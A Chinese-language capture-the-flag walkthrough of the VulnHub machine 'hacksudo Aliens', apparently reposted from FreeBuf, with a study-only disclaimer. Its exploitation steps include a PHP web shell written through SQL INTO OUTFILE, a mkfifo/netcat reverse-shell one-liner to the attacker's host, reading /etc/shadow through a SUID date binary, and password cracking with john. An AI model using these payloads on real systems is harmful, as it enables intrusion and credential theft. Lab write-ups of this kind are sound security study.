vulnhub系列6——hacksudo Aliens 

前言:

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

netdiscover -r 192.168.56.0/24

nmap -sV -Pn -sC 192.168.56.125

vulnhub系列6——hacksudo Aliens 

9000端口是phpmyadmin,先对80端口的站点进行目录扫描。

gobuster dir -u http://192.168.56.125 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html.cgi。

vulnhub系列6——hacksudo Aliens 

/backup下存放着phpmyadmin的账号和密码。

账号:vishal。

密码:hacksudo。

vulnhub系列6——hacksudo Aliens 

二、反弹shell

show global variables like ‘%secure%’。

权限没有限制,直接写入shell。

vulnhub系列6——hacksudo Aliens 

select ‘<?php system($_GET[1]);?>’ into outfile “/var/www/html/test.php”。

http://192.168.56.125/test.php?1=id

vulnhub系列6——hacksudo Aliens 
vulnhub系列6——hacksudo Aliens 

直接反弹shell,需要url编码后使用。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.56.105 6666 >/tmp/f。

获得一个稳定的shell。

python3 -c “import pty;pty.spawn(‘/bin/bash’);”。

vulnhub系列6——hacksudo Aliens 

三、提权

通过cat /etc/passwd可以发现还有一个hacksudo的用户。

vulnhub系列6——hacksudo Aliens san

但是无法读取用户的密码,看看有没有脆弱的suid,find / -perm -u=s -type f 2>/dev/null。

vulnhub系列6——hacksudo Aliens 

data有个可以利用的点,读取任意文件,因此读取密码文件。

vulnhub系列6——hacksudo Aliens 

LFILE=/etc/shadow。

/usr/bin/date -f $LFILE。

vulnhub系列6——hacksudo Aliens 

后面经过爆破,root的没有爆破出来,hacksudo的密码爆破出来了。

john a.txt。

vulnhub系列6——hacksudo Aliens 

后面提权就容易了,登录hacksudo用户,suid提权即可。

vulnhub系列6——hacksudo Aliens 
vulnhub系列6——hacksudo Aliens 

本文作者:次第花开, 转载请注明来自FreeBuf.COM

# 靶场实战

主题测试文章,只做测试使用。发布者:1869,转转请注明出处:https://community.anqiangkj.com/archives/24208

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年9月24日 下午9:33
下一篇 2022年9月24日 下午10:03

相关推荐